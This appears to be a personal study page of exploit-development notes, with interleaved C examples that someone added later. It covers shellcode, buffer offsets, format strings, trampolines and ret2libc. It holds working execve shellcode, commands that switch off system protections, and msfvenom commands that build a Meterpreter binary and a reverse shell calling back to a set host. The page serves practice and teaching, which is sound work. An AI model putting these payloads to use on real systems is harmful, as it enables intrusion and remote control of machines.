|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 13.09.2019

basic exploitation


Here I collect some notes on finding publicly available exploits and on creating or modifying your own simple exploits.

exploitation

The site io.netgarage.org offers a good start for practice.

windows mitigation timeline


The following table lists some exploit mitigations and the Windows version that first shipped each of them; later versions keep the earlier ones. EMET was a separately installed toolkit rather than part of the OS.

XP SP2       Vista     Windows 7   Windows 8    Windows 10
DEP          ASLR      EMET        GuardPages   CFG
SafeSEH      LFH
SafeUnlink   SEHOP
Canaries

find publicly available exploits


online exploit resources

www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid

exploit-db (offline)

searchsploit <search_string>
grep <search_string> /usr/share/exploitdb/files.csv

compilation


show local libc version

$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1

compile for 32bit target

apt install gcc-multilib
gcc -m32 exploit.c -o exploit

compile for windows target

/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe

Another way to set up the cross-compile environment is to install veil-evasion.

meterpreter binary

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe

disable ASLR, PIE, NX, canaries, RELRO and compiler optimization

To practice or analyze simple exploits it helps to switch the mitigations off. On Linux the first command below disables ASLR system wide (as root; it affects every new process), and the gcc flags build a binary without PIE, with an executable stack (no NX), without stack canaries, without RELRO and without optimizations that would reorder or remove the vulnerable code.

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0

shellcode generation


A good resource for already assembled shellcode is shell-storm.org.

Information on opcodes and Linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.

shell.s

BITS 32
xor    eax,eax          ; eax = 0, also used as the NUL and NULL pushed below
xor    edx,edx          ; edx = envp = NULL
push   eax              ; "\0"
push   0x68732f2f       ; "//sh"
push   0x6e69622f       ; "/bin"  -> esp points to "/bin//sh\0"
mov    ebx,esp          ; ebx = filename
push   eax              ; argv[1] = NULL
push   ebx              ; argv[0] = filename
mov    ecx,esp          ; ecx = argv
mov    al,0xb           ; eax = 11 = __NR_execve (mov al avoids the null bytes of mov eax,0xb)
int    0x80             ; execve("/bin//sh", argv, NULL)

Assemble the file and print the opcode string

nasm shell.s -o shell
xxd -p shell

radare2

With radare2 you can do this in one step

rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"

metasploit

Alternatively you can generate shellcode with metasploit

msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c

To test the generated shellcode you can use the following program

shellcode_test.c

#include <stdlib.h>

/* execve("/bin//sh") shellcode assembled from shell.s: 25 bytes, no null bytes */
char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    /* treat the data buffer as a function and jump into it; this only works
       because -z execstack makes the memory of the 32-bit process executable */
    void (*f)(void) = (void (*)(void))sc;
    f();
    return 0;
}

compile the above with

gcc -m32 -z execstack -o shellcode_test shellcode_test.c
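Shellcode that travels through strcpy, gets or a text protocol must not contain bytes the copy routine stops at or mangles. shell.s avoids them (mov al,0xb instead of mov eax,0xb, "/bin//sh" instead of a null-padded "/bin/sh"), and msfvenom's -b "\x00\x0a" does the same for generated payloads. The following check is an added example, not code from the original notes: it scans a shellcode byte string for a set of bad characters and shows how much of it a strcpy would actually copy. SC holds the 25 bytes from shellcode_test.c; MOV_EAX_0B is a constructed counter example.

```c
#include <stddef.h>
#include <stdio.h>

/* Index of the first byte of sc[0..n) that is in the bad set, or -1 if none. */
long first_bad_byte(const unsigned char *sc, size_t n,
                    const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (sc[i] == bad[j])
                return (long)i;
    return -1;
}

/* Total number of bad bytes (how many an encoder would have to remove). */
size_t count_bad_bytes(const unsigned char *sc, size_t n,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (sc[i] == bad[j])
                hits++;
    return hits;
}

/* How many bytes a strcpy()-style copy transfers before it stops at a NUL. */
size_t strcpy_would_copy(const unsigned char *sc, size_t n)
{
    size_t i = 0;
    while (i < n && sc[i] != 0)
        i++;
    return i;
}

/* The 25 bytes assembled from shell.s (same bytes as in shellcode_test.c). */
static const unsigned char SC[] =
    "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SC_LEN (sizeof SC - 1)          /* without the string literal's own NUL */

/* Constructed counter example: "mov eax,0xb" assembles to b8 0b 00 00 00. */
static const unsigned char MOV_EAX_0B[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* Same bad set as msfvenom -b "\x00\x0a": NUL ends strcpy, newline ends gets/fgets. */
static const unsigned char BAD[] = { 0x00, 0x0a };

int main(void)
{
    printf("shell.s     : %zu bytes, first bad byte at %ld, strcpy copies %zu\n",
           SC_LEN, first_bad_byte(SC, SC_LEN, BAD, sizeof BAD),
           strcpy_would_copy(SC, SC_LEN));
    printf("mov eax,0xb : %zu bytes, first bad byte at %ld, strcpy copies %zu\n",
           sizeof MOV_EAX_0B,
           first_bad_byte(MOV_EAX_0B, sizeof MOV_EAX_0B, BAD, sizeof BAD),
           strcpy_would_copy(MOV_EAX_0B, sizeof MOV_EAX_0B));
    return 0;
}
```

The bad set depends on the input path: for strcpy only NUL matters, for gets/fgets also 0x0a, and for HTTP headers or other text protocols bytes such as 0x0d, 0x20 or 0x25 are added; encoders (msfvenom -e) then rewrite the payload so that none of them occur.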

determine buffer length


metasploit

/usr/share/metasploit-framework/tools/pattern_create.rb 300
/usr/share/metasploit-framework/tools/pattern_offset.rb 0x396a4138

peda

gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41
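The same job without Metasploit or peda, as an added example that is not part of the original notes: pattern_create() reproduces Metasploit's cyclic pattern (upper case letter, lower case letter, digit, with the digit changing fastest) and pattern_offset() searches for the 4 bytes of a crashed register value in memory order, i.e. little-endian, which is how pattern_offset.rb interprets a hex argument. With the 300 byte pattern from above, 0x396a4138 ("8Aj9" in memory) is found at offset 296. peda's pattern is generated differently, so the 0x41416d41 value from the peda example does not occur in this one.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit's pattern repeats after 26*26*10 triplets of 3 bytes. */
#define PATTERN_MAX (26 * 26 * 10 * 3)

/* Fill out[0..len) with "Aa0Aa1Aa2...Aa9Ab0Ab1..." and return the number of
   bytes written (capped at PATTERN_MAX; add a NUL yourself for a C string). */
size_t pattern_create(char *out, size_t len)
{
    size_t i = 0;
    if (len > PATTERN_MAX)
        len = PATTERN_MAX;
    for (int u = 0; u < 26 && i < len; u++)
        for (int l = 0; l < 26 && i < len; l++)
            for (int d = 0; d < 10 && i < len; d++) {
                const char trip[3] = { (char)('A' + u), (char)('a' + l), (char)('0' + d) };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = trip[k];
            }
    return i;
}

/* Offset of a 4-byte sequence inside the full pattern, or -1 if it never occurs. */
long pattern_offset_bytes(const unsigned char needle[4])
{
    static char pat[PATTERN_MAX];
    size_t n = pattern_create(pat, sizeof pat);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Same for a register value taken from a crash dump. The value is searched in
   the byte order it has in memory on x86, i.e. little-endian: 0x396a4138 is
   the bytes 38 41 6a 39 = "8Aj9". */
long pattern_offset(uint32_t value)
{
    const unsigned char le[4] = {
        (unsigned char)(value & 0xff),         (unsigned char)((value >> 8) & 0xff),
        (unsigned char)((value >> 16) & 0xff), (unsigned char)(value >> 24)
    };
    return pattern_offset_bytes(le);
}

int main(int argc, char **argv)
{
    char buf[PATTERN_MAX + 1];
    size_t len = argc > 1 ? strtoul(argv[1], NULL, 0) : 300;   /* pattern length */
    size_t n = pattern_create(buf, len);
    buf[n] = '\0';
    printf("%s\n", buf);
    printf("offset of 0x396a4138: %ld\n", pattern_offset(0x396a4138));   /* 296 */
    return 0;
}
```

Offset 296 in a 300 byte pattern means the saved return address starts 296 bytes into the buffer, so the exploit places the trampoline or return address at that position and the remaining payload after it.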

format string exploits


On 64-bit Linux (System V ABI) the first six integer arguments of a function are passed in RDI, RSI, RDX, RCX, R8 and R9, all further arguments on the stack. For printf-style functions RDI holds the format string itself, so %1$ to %5$ select RSI to R9 and %6$ is the first stack slot. Depending on where the vulnerable call sits, the contents of these registers and of the stack can be read, and with the %n family also written.

read data

%6$p
affeaffeaffeaffe%6$s

%6$p prints the sixth argument, i.e. the first stack slot, as a pointer. If the input buffer itself sits in that slot, its first 8 bytes (affeaffeaffeaffe is a placeholder for the address) become the pointer that %6$s dereferences, so memory at an address of your choice is printed.

write data

%199x...affeaffeaffeaffe%7$hhn

"%199x..." fills the first 8 bytes of the buffer, so the address that follows at offset 8 lands in the seventh argument slot; it also emits 199 characters of padding plus the three dots, and %7$hhn then stores the low byte of that character count at the address. Each further byte needs another conversion with padding adjusted to the count reached so far (modulo 256) and the next address. A 64-bit address contains null bytes that terminate the format string, so in practice the addresses go at the end of the buffer and the argument index is computed from their position.
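Worked example, added here and not part of the original notes: the padding arithmetic behind "%199x...%7$hhn". fmt_pad() computes the field width that makes the low byte of printf's character counter equal to the byte to be written (199 = 0xc7 for a fresh counter), and fmt_write_demo() chains four such writes in one format string to place 0xdeadbeef byte by byte. The format in the demo is a string literal with %*x widths and the target pointers are passed directly, so it does not depend on the stack layout of a real target; in an exploit the pointers come from the input buffer via %N$hhn as above, and the vulnerable call is printf(buf) where it should be printf("%s", buf).

```c
#include <stdint.h>
#include <stdio.h>

/* Width for a padding conversion such as %199x so that, once it has been
   printed, the low byte of printf's character counter equals `want`.
   Returns 1..256: a %x of the value 0 always emits at least one character,
   and a byte that is already correct still needs a full 256 to wrap around. */
int fmt_pad(int count_so_far, unsigned char want)
{
    int pad = (int)(((unsigned)want - (unsigned)(count_so_far & 0xff)) & 0xffu);
    return pad ? pad : 256;
}

/* Write the bytes ef be ad de one by one with four chained %hhn conversions,
   each preceded by its own padding, and return them assembled as 0xdeadbeef. */
uint32_t fmt_write_demo(void)
{
    static const unsigned char want[4] = { 0xef, 0xbe, 0xad, 0xde };
    signed char b[4] = { 0, 0, 0, 0 };      /* %hhn stores through a signed char * */
    int pad[4], count = 0;
    char out[1100];                         /* at most 4 * 256 padding characters */

    for (int i = 0; i < 4; i++) {
        pad[i] = fmt_pad(count, want[i]);   /* 239, 207, 239, 49 for these bytes */
        count += pad[i];                    /* the counter printf will have reached */
    }
    /* %*x takes its field width from the argument list: "%*x" with 199 == "%199x" */
    snprintf(out, sizeof out, "%*x%hhn%*x%hhn%*x%hhn%*x%hhn",
             pad[0], 0u, &b[0], pad[1], 0u, &b[1],
             pad[2], 0u, &b[2], pad[3], 0u, &b[3]);

    return (uint32_t)(unsigned char)b[0]
         | (uint32_t)(unsigned char)b[1] << 8
         | (uint32_t)(unsigned char)b[2] << 16
         | (uint32_t)(unsigned char)b[3] << 24;
}

int main(void)
{
    printf("padding before %%hhn to write 0xc7: %d\n", fmt_pad(0, 0xc7));   /* 199 */
    printf("value assembled from four %%hhn writes: 0x%08x\n", fmt_write_demo());
    return 0;
}
```

Writing byte-wise with %hhn keeps the total output small (at most 256 characters per byte) compared to %n with a full 32-bit value, which is why the page uses the hh modifier.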

find trampolines


metasploit

/usr/share/metasploit-framework/tools/nasm_shell.rb
nasm > jmp eax
00000000  FFE0              jmp eax

objdump -D <binary> | grep "ff e0"

peda

gdb-peda$ jmpcall esp libc
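An added example, not from the original page, that generalises the jmp eax = FF E0 lookup: on x86 the second byte of jmp r32 is E0+r and of call r32 is D0+r, where r is the register number (eax=0, ecx=1, edx=2, ebx=3, esp=4, ebp=5, esi=6, edi=7), and push r32; ret (50+r, C3) ends up in the same place. So jmp esp is FF E4 and call esp is FF D4. The scanner below finds all three forms at any byte offset in a buffer, which is what a trampoline search needs since the bytes do not have to be an aligned instruction of the original program. SAMPLE is a constructed buffer; in practice the bytes come from the target binary or a loaded module.

```c
#include <stddef.h>
#include <stdio.h>

static const char *const REG[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };

enum { R_EAX, R_ECX, R_EDX, R_EBX, R_ESP, R_EBP, R_ESI, R_EDI };

/* If buf[i] starts a register trampoline, return the register number (0..7)
   and describe the form in *kind; otherwise return -1. */
int decode_trampoline(const unsigned char *buf, size_t n, size_t i, const char **kind)
{
    if (i + 2 > n)
        return -1;
    if (buf[i] == 0xff && (buf[i + 1] & 0xf8) == 0xe0) { *kind = "jmp";       return buf[i + 1] & 7; }
    if (buf[i] == 0xff && (buf[i + 1] & 0xf8) == 0xd0) { *kind = "call";      return buf[i + 1] & 7; }
    if ((buf[i] & 0xf8) == 0x50 && buf[i + 1] == 0xc3) { *kind = "push; ret"; return buf[i] & 7; }
    return -1;
}

/* Offset of the first trampoline that transfers control to register `reg`, or -1. */
long find_trampoline(const unsigned char *buf, size_t n, int reg)
{
    const char *kind;
    for (size_t i = 0; i < n; i++)
        if (decode_trampoline(buf, n, i, &kind) == reg)
            return (long)i;
    return -1;
}

/* Print every trampoline with its address (`base` + offset) and return the count. */
int list_trampolines(const unsigned char *buf, size_t n, unsigned long base)
{
    int found = 0;
    const char *kind;
    for (size_t i = 0; i < n; i++) {
        int r = decode_trampoline(buf, n, i, &kind);
        if (r >= 0) {
            printf("0x%08lx: %s %s\n", base + i, kind, REG[r]);
            found++;
        }
    }
    return found;
}

/* Constructed sample: nop; nop; jmp esp; nop; push esp; ret; call eax; int3 */
static const unsigned char SAMPLE[] = { 0x90, 0x90, 0xff, 0xe4, 0x90, 0x54, 0xc3, 0xff, 0xd0, 0xcc };

int main(void)
{
    list_trampolines(SAMPLE, sizeof SAMPLE, 0x08048000ul);
    printf("first trampoline into esp at offset %ld\n",
           find_trampoline(SAMPLE, sizeof SAMPLE, R_ESP));   /* 2 */
    return 0;
}
```

For a stack-based overflow the usual target is esp (the payload sits right after the overwritten return address), so the same search is typically run for FF E4 in a module that is not ASLR'd and not rebased.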

find strings in binary


gdb

gdb$ br __libc_start_main
gdb$ run
gdb$ info sharedlibrary
gdb$ find &system,+9999999,"/bin/sh"

peda

gdb-peda$ br __libc_start_main
gdb-peda$ run
gdb-peda$ searchmem "/bin/sh" libc
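What the gdb find command does, as a standalone program added here (not part of the original notes): it walks /proc/self/maps, picks the readable mappings that belong to libc and scans them for the string, printing the absolute address and the offset from the start of libc's lowest mapping. That offset is the part that stays constant across runs under ASLR, which is what a ret2libc payload needs once the base is leaked. The rule for recognising libc (a file named libc.so* or libc-<version>.so) is an assumption that holds for glibc on Debian/Ubuntu style systems; parse_maps_line() is kept separate so it can be checked on constructed lines.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct mapping {
    uintptr_t start, end;
    char perms[5];
    char path[256];
};

/* Parse one line of /proc/self/maps, e.g.
   "7f1c2a400000-7f1c2a428000 r--p 00000000 08:01 1234   /usr/lib/x86_64-linux-gnu/libc.so.6"
   Returns 1 for a file-backed mapping, 0 for anonymous or malformed lines. */
int parse_maps_line(const char *line, struct mapping *m)
{
    unsigned long start, end, offset;
    m->path[0] = '\0';
    if (sscanf(line, "%lx-%lx %4s %lx %*s %*s %255s",
               &start, &end, m->perms, &offset, m->path) < 4)
        return 0;
    m->start = (uintptr_t)start;
    m->end = (uintptr_t)end;
    return m->path[0] == '/';
}

/* Readable mapping of the C library? Assumption: the file is called libc.so*
   or libc-<version>.so (glibc naming). Deliberately excludes libcrypto, libcap
   and similar names, and unreadable guard regions (---p) inside libc. */
int is_libc_mapping(const struct mapping *m)
{
    const char *base = strrchr(m->path, '/');
    base = base ? base + 1 : m->path;
    return m->perms[0] == 'r' &&
           (strncmp(base, "libc.so", 7) == 0 || strncmp(base, "libc-", 5) == 0);
}

/* Convenience for checking a single maps line. */
int maps_line_is_libc(const char *line)
{
    struct mapping m;
    return parse_maps_line(line, &m) && is_libc_mapping(&m);
}

/* Search libc's readable mappings for `needle` including its terminating NUL,
   like gdb's find &system,+9999999,"/bin/sh". Returns the address or 0 and
   stores the start of libc's lowest mapping in *libc_base. */
uintptr_t find_libc_string(const char *needle, uintptr_t *libc_base)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    struct mapping m;
    size_t len = strlen(needle) + 1;
    uintptr_t hit = 0, base = 0;

    if (!maps)
        return 0;
    while (fgets(line, sizeof line, maps)) {
        if (!parse_maps_line(line, &m) || !is_libc_mapping(&m))
            continue;
        if (base == 0 || m.start < base)
            base = m.start;
        if (hit)
            continue;
        const unsigned char *p = (const unsigned char *)m.start;
        for (size_t i = 0; i + len <= m.end - m.start; i++)
            if (memcmp(p + i, needle, len) == 0) {
                hit = m.start + i;
                break;
            }
    }
    fclose(maps);
    if (libc_base)
        *libc_base = base;
    return hit;
}

int main(void)
{
    uintptr_t base = 0;
    uintptr_t addr = find_libc_string("/bin/sh", &base);

    if (!addr) {
        puts("\"/bin/sh\" not found in any libc mapping");
        return 1;
    }
    printf("libc base      : 0x%lx\n", (unsigned long)base);
    printf("\"/bin/sh\" found: 0x%lx (libc + 0x%lx)\n",
           (unsigned long)addr, (unsigned long)(addr - base));
    return 0;
}
```

Run it a few times with ASLR enabled: the absolute addresses change, the "libc + ..." offset does not. Scanning only libc's mappings also avoids a false hit on the program's own "/bin/sh" literal in its .rodata.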